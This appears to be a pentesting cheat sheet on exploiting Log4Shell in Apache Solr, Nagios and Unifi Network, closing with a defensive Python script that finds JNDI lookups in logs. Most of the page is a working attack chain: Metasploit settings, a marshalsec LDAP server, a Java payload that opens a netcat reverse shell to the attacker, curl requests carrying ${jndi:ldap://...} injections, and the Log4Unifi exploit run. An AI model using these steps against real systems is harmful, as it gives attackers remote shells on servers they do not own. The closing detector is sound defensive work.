Log4j Pentesting
Last modified: 2023-02-14
Log4j is affected by the Log4Shell zero-day vulnerability, which tools such as Log4Unifi exploit.
msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell
Exploit Apache Solr (JNDI)
You need four local terminals.
1. Start LDAP Server on Your Local Terminal 1
- Install Maven
sudo apt install maven
- Get the Payload
Download the repository.
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
Then build the marshalsec utility.
mvn clean package -DskipTests
- Start LDAP Server
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"
2. Host the Exploit on Your Local Terminal 2
- Create the Exploit with Java
First, create a new directory and, inside it, a new file named "Exploit.java".
Open it in your favorite editor, such as vim.
mkdir exploit
cd exploit
vim Exploit.java
In the editor, enter the following code.
public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
- Compile the Payload
javac Exploit.java -source 8 -target 8
- Start Web Server to Host the Payload
python3 -m http.server 8000
3. Open Listener on Your Local Terminal 3
nc -lvnp <your-local-listener-port>
4. Send the Request to the Target Website
# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'
# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'
Exploit Unifi Network using Log4Unifi
Log4Unifi is a tool for exploiting Log4j in Unifi Network.
1. Test the Vulnerability in the Target Web Page
curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'
2. Open Listener on Your Local Machine
nc -lvnp 4444
3. Exploit
Download the exploit from the repository.
git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4jUnifi
Run the exploit.
python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444
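
A defender-side check for the three request forms shown on this page (Solr query parameter, Nagios Accept header, Unifi login body), added here as an example and not part of the original notes or of any tool they reference. It scans logged requests for `${jndi:...}` lookups, percent-decoding first because access logs usually record the query string encoded, and extracts the callback host and port for egress hunting. The record layout (`url`, `headers`, `body`), the function names and the sample data are assumptions constructed for the example.

```python
import json
import re
from urllib.parse import unquote

# Lookup form used in the requests above: ${jndi:<scheme>://host[:port]/path}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

def find_jndi(value, max_decode=2):
    """Return JNDI lookups in a string, percent-decoding up to max_decode times."""
    hits, seen = [], set()
    for _ in range(max_decode + 1):
        for m in JNDI_RE.finditer(value):
            if m.group(0) not in seen:
                seen.add(m.group(0))
                hits.append(m.groupdict())
        decoded = unquote(value)
        if decoded == value:  # nothing left to decode
            break
        value = decoded
    return hits

def scan_request(req):
    """Scan the URL, every header value and the body of one logged request."""
    fields = [("url", req.get("url", ""))]
    fields += [("header:" + k, v) for k, v in req.get("headers", {}).items()]
    fields.append(("body", req.get("body", "")))
    return [{"location": loc, **hit} for loc, val in fields for hit in find_jndi(val)]

# Constructed sample records; hosts use documentation ranges and reserved names.
SAMPLE_REQUESTS = [
    {"url": "/solr/admin/cores?foo=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A1389%2FExploit%7D"},
    {"url": "/~logs", "headers": {"Accept": "${jndi:ldap://192.0.2.10:1389/Exploit}"}},
    {"url": "/api/login",
     "body": json.dumps({"username": "a",
                         "remember": "${jndi:ldap://callback.example:1389/o=tomcat}"})},
    {"url": "/solr/admin/cores?action=STATUS", "headers": {"Accept": "*/*"}},  # benign
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        for f in scan_request(req):
            print(f["location"], f["scheme"], f["host"], f["port"], f["path"])
```

A hit means the lookup string reached the server, not that it was evaluated; correlate the extracted host and port with outbound connection logs from the same host.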